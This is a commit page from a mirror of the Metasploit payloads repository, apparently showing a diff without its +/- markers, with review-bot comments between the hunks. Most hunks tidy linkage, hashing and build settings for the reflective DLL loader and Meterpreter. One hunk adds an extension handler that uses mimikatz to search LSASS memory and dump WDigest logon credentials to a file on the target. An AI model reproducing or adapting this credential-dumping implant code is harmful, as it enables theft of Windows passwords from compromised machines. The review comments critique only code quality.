mirror of
https://github.com/rapid7/metasploit-payloads
synced 2024-11-26 17:41:08 +01:00
Tidy
parent
979e22f774
commit
21e2b1fecf
@ -35,15 +35,11 @@
|
||||
#pragma comment (lib,"Delayimp.lib")
|
||||
|
||||
// we use this like a macro to set the hook in an server extension that requires it
|
||||
#define EnableDelayLoadMetSrv() PfnDliHook __pfnDliNotifyHook2 = delayHook; // set our delay loader hook, see DelayLoadMetSrv.c
|
||||
#define EnableDelayLoadMetSrv() PfnDliHook __pfnDliNotifyHook2 = delayHook; // set our delay loader hook, see DelayLoadMetSrv.c
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" HMODULE hMetSrv;
|
||||
extern "C" FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli );
|
||||
#else
|
||||
extern HMODULE hMetSrv;
|
||||
FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli );
|
||||
#endif
|
||||
extern HMODULE hMetSrv;
|
||||
|
||||
FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli );
|
||||
|
||||
//===============================================================================================//
|
||||
#endif
|
||||
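Review bot: With the `#ifdef __cplusplus` branch gone, nothing in this header records that `hMetSrv` and `delayHook` must keep C linkage, so a C++ file that includes it outside an `extern "C"` block will declare C++-mangled names and fail at link time rather than at the include. If the wrapping is now the includer's job, say so next to the declarations, e.g. `// C linkage: C++ translation units must include this header inside extern "C" { }`. The same applies to the `Init` declaration in the ReflectiveLoader hunk and to `command_register`/`command_deregister` in the `Command` hunk, which appear to lose their guards in the same way.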
|
@ -183,7 +183,7 @@ geteip:
|
||||
while( usCounter > 0 )
|
||||
{
|
||||
// compute the hash values for this function name
|
||||
dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
|
||||
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
|
||||
|
||||
// if we have found a function we want we get its virtual address
|
||||
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH || dwHashValue == VIRTUALLOCK_HASH || dwHashValue == OUTPUTDEBUG_HASH )
|
||||
@ -435,22 +435,13 @@ geteip:
|
||||
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
||||
|
||||
// you must implement this function...
|
||||
extern DWORD DLLEXPORT Init( SOCKET socket );
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" DWORD DLLEXPORT Init( SOCKET socket );
|
||||
extern "C" BOOL MetasploitDllAttach( SOCKET socket )
|
||||
{
|
||||
Init( socket ) ;
|
||||
return TRUE;
|
||||
}
|
||||
#else
|
||||
DWORD DLLEXPORT Init( SOCKET socket );
|
||||
BOOL MetasploitDllAttach( SOCKET socket )
|
||||
{
|
||||
Init( socket );
|
||||
return TRUE;
|
||||
}
|
||||
#endif
|
||||
|
||||
BOOL MetasploitDllDetach( DWORD dwExitFunc )
|
||||
{
|
||||
|
@ -63,7 +63,7 @@ __forceinline DWORD ror( DWORD d )
|
||||
|
||||
|
||||
|
||||
__forceinline DWORD _hash( char * c )
|
||||
__forceinline DWORD hash( char * c )
|
||||
{
|
||||
register DWORD h = 0;
|
||||
do
|
||||
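Review bot: A file-scope function called `hash` is easy to collide with once this file is pulled into a C++ translation unit. The mimikatz source on this page includes `ReflectiveLoader.c` directly and uses `vector`/`wstring` unqualified, so if a `using namespace std;` is in effect there, the call `hash( ... )` can become ambiguous with `std::hash`. This assumes the new side is the `hash` spelling, since the page has lost its +/- markers. A project-prefixed name such as `rdi_hash` would avoid both that clash and the reserved leading-underscore form `_hash`. The function body continues outside the hunk.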
|
@ -40,13 +40,8 @@ typedef struct command
|
||||
struct command *prev;
|
||||
} Command;
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" LINKAGE DWORD command_register(Command *command);
|
||||
extern "C" LINKAGE DWORD command_deregister(Command *command);
|
||||
#else
|
||||
LINKAGE DWORD command_register(Command *command);
|
||||
LINKAGE DWORD command_deregister(Command *command);
|
||||
#endif
|
||||
|
||||
LINKAGE VOID command_join_threads( VOID );
|
||||
|
||||
|
@ -203,7 +203,7 @@ static void real_dprintf(char *format, ...) {
|
||||
va_start(args,format);
|
||||
vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
|
||||
strcat_s(buffer, sizeof(buffer), "\r\n");
|
||||
OutputDebugStringA(buffer);
|
||||
OutputDebugString(buffer);
|
||||
}
|
||||
|
||||
#endif
|
||||
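Review bot: `buffer` is filled by `vsnprintf_s` and `strcat_s`, so it is a `char` array, and the generic `OutputDebugString` macro only accepts it when the project is built without `UNICODE`. If the new side is the un-suffixed call (the +/- markers are lost on this page), a Unicode build would resolve it to `OutputDebugStringW` and reject the narrow buffer. Keeping the explicit `OutputDebugStringA(buffer);` makes the helper independent of the character-set setting. `real_dprintf` starts above the hunk.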
|
@ -1,18 +1,28 @@
|
||||
#ifndef _METERPRETER_SOURCE_EXTENSION_BOILER_BOILER_H
|
||||
#define _METERPRETER_SOURCE_EXTENSION_BOILER_BOILER_H
|
||||
#ifndef _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H
|
||||
#define _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H
|
||||
extern "C"
|
||||
{
|
||||
#include "../../common/common.h"
|
||||
}
|
||||
#endif
|
||||
|
||||
#include <io.h>
|
||||
#include <fcntl.h>
|
||||
#include <iostream>
|
||||
#include <fstream>
|
||||
|
||||
#include "mimikatz.h"
|
||||
|
||||
extern "C"
|
||||
{
|
||||
|
||||
#include "modules/mod_mimikatz_sekurlsa.h"
|
||||
|
||||
/* Benjamin DELPY `gentilkiwi`
|
||||
http://blog.gentilkiwi.com
|
||||
benjamin@gentilkiwi.com
|
||||
Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/fr/
|
||||
*/
|
||||
#include "modules/globdefs.h"
|
||||
#include <io.h>
|
||||
#include <fcntl.h>
|
||||
#include "mimikatz.h"
|
||||
|
||||
|
||||
#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
|
||||
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
|
||||
@ -20,11 +30,36 @@
|
||||
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
|
||||
#include "../../ReflectiveDLLInjection/ReflectiveLoader.c"
|
||||
|
||||
|
||||
// this sets the delay load hook function, see DelayLoadMetSrv.h
|
||||
EnableDelayLoadMetSrv();
|
||||
|
||||
DWORD request_boiler(Remote *remote, Packet *packet)
|
||||
{
|
||||
packet_transmit_response(0, remote, packet);
|
||||
FILE *ficheiro = fopen("c:\\test.txt", "wb");
|
||||
fclose(ficheiro);
|
||||
std::wofstream logFile( "c:\\out.txt");
|
||||
std::wstreambuf *outbuf = std::wcout.rdbuf(logFile.rdbuf());
|
||||
std::wstreambuf *errbuf = std::wcerr.rdbuf(logFile.rdbuf());
|
||||
|
||||
vector<wstring> * mesArguments = new vector<wstring>();
|
||||
|
||||
mimikatz * myMimiKatz = new mimikatz(mesArguments);
|
||||
|
||||
vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
|
||||
monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData, wstring(L"wdigest")));
|
||||
|
||||
if (mod_mimikatz_sekurlsa::searchLSASSDatas())
|
||||
{
|
||||
mod_mimikatz_sekurlsa::getLogonData(mesArguments, &monProvider);
|
||||
}
|
||||
|
||||
std::wcout.rdbuf(outbuf);
|
||||
std::wcerr.rdbuf(errbuf);
|
||||
|
||||
packet_transmit_response(0, remote, packet);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
@ -73,6 +108,7 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
//int wmain(int argc, wchar_t * argv[])
|
||||
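Review bot: In `request_boiler`, the result of `fopen("c:\\test.txt", "wb")` goes straight to `fclose`, so a failed open (for example no write access to the drive root) hands a null pointer to the CRT inside the host process; guard it with `if (ficheiro) fclose(ficheiro);` or drop the scratch file. `mesArguments` and `myMimiKatz` are allocated with `new` and never freed in the visible body, so each request leaks them; automatic objects (`vector<wstring> mesArguments;`, then passing `&mesArguments`) would do unless something outside this hunk keeps the pointers. The `wcout`/`wcerr` buffers are restored only on the straight-line path, so an exception from the sekurlsa calls would leave both streams pointing at `logFile`'s buffer after it is destroyed. The fixed `c:\\out.txt` redirect also leaves recovered logon data on the disk of the system under test, which looks like debugging scaffolding that should not reach a merged build.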
|
@ -1,8 +1,3 @@
|
||||
#ifndef _METERPRETER_SOURCE_EXTENSION_BOILER_BOILER_H
|
||||
#define _METERPRETER_SOURCE_EXTENSION_BOILER_BOILER_H
|
||||
#include "../../common/common.h"
|
||||
#endif
|
||||
|
||||
/* Benjamin DELPY `gentilkiwi`
|
||||
http://blog.gentilkiwi.com
|
||||
benjamin@gentilkiwi.com
|
||||
@ -10,7 +5,7 @@
|
||||
*/
|
||||
#pragma once
|
||||
#include "modules/globdefs.h"
|
||||
#include "modules/mod_parseur.h"
|
||||
#include "modules/mod_parseur.h"
|
||||
#include "modules/mod_pipe.h"
|
||||
#include "modules/mod_process.h"
|
||||
#include "modules/mod_system.h"
|
||||
|
@ -13,21 +13,12 @@
|
||||
* Entry point for the DLL (or not if compiled as an EXE)
|
||||
*/
|
||||
#ifdef _WIN32
|
||||
#ifdef __cplusplus
|
||||
extern "C" DWORD __declspec(dllexport) Init(SOCKET fd)
|
||||
{
|
||||
|
||||
return server_setup(fd);
|
||||
|
||||
}
|
||||
#else
|
||||
DWORD __declspec(dllexport) Init(SOCKET fd)
|
||||
{
|
||||
|
||||
return server_setup(fd);
|
||||
|
||||
}
|
||||
#endif
|
||||
#else
|
||||
|
||||
// rtld dynamically links libc/libm/libcrypto/libssl/metsrv_main
|
||||
|
@ -65,8 +65,8 @@
|
||||
<OutDir Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">$(SolutionDir)$(Configuration)\</OutDir>
|
||||
<IntDir Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">$(Configuration)\</IntDir>
|
||||
<LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</LinkIncremental>
|
||||
<OutDir Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">$(SolutionDir)$(Configuration)\</OutDir>
|
||||
<IntDir Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">$(Configuration)\</IntDir>
|
||||
<OutDir Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">$(Configuration)\$(Platform)\</OutDir>
|
||||
<IntDir Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">$(Configuration)\$(Platform)\</IntDir>
|
||||
<LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</LinkIncremental>
|
||||
<GenerateManifest Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</GenerateManifest>
|
||||
<OutDir Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">$(SolutionDir)$(Configuration)\$(Platform)\</OutDir>
|
||||
@ -88,6 +88,8 @@
|
||||
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
|
||||
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|x64'" />
|
||||
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|x64'" />
|
||||
<TargetName Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">$(ProjectName).x86</TargetName>
|
||||
<TargetName Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">$(ProjectName).x86</TargetName>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
@ -109,6 +111,9 @@
|
||||
<TargetMachine>MachineX86</TargetMachine>
|
||||
<AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;;psapi.lib;advapi32.lib;user32.lib;secur32.lib;crypt32.lib;shlwapi.lib;wtsapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
</Link>
|
||||
<PostBuildEvent>
|
||||
<Command>copy /y "$(OutDir)$(TargetName)$(TargetExt)" "$(ProjectDir)..\..\output\"</Command>
|
||||
</PostBuildEvent>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
@ -150,6 +155,9 @@
|
||||
<TargetMachine>MachineX86</TargetMachine>
|
||||
<MinimumRequiredVersion>5.0</MinimumRequiredVersion>
|
||||
</Link>
|
||||
<PostBuildEvent>
|
||||
<Command>copy /y "$(OutDir)$(TargetName)$(TargetExt)" "$(ProjectDir)..\..\output\"</Command>
|
||||
</PostBuildEvent>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Midl>
|
||||
|
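Review bot: The new post-build step is identical for Debug|Win32 and Release|Win32, and both configurations now share the target name `$(ProjectName).x86`, so whichever was built last overwrites the other in `$(ProjectDir)..\..\output\`. That makes it possible to pick up a debug binary from the output folder believing it is the release one. Either restrict the copy to Release or copy into a per-configuration folder, e.g. `copy /y "$(OutDir)$(TargetName)$(TargetExt)" "$(ProjectDir)..\..\output\$(Configuration)\"`. The x64 groups are outside the visible hunks, so whether they have a matching step cannot be checked here.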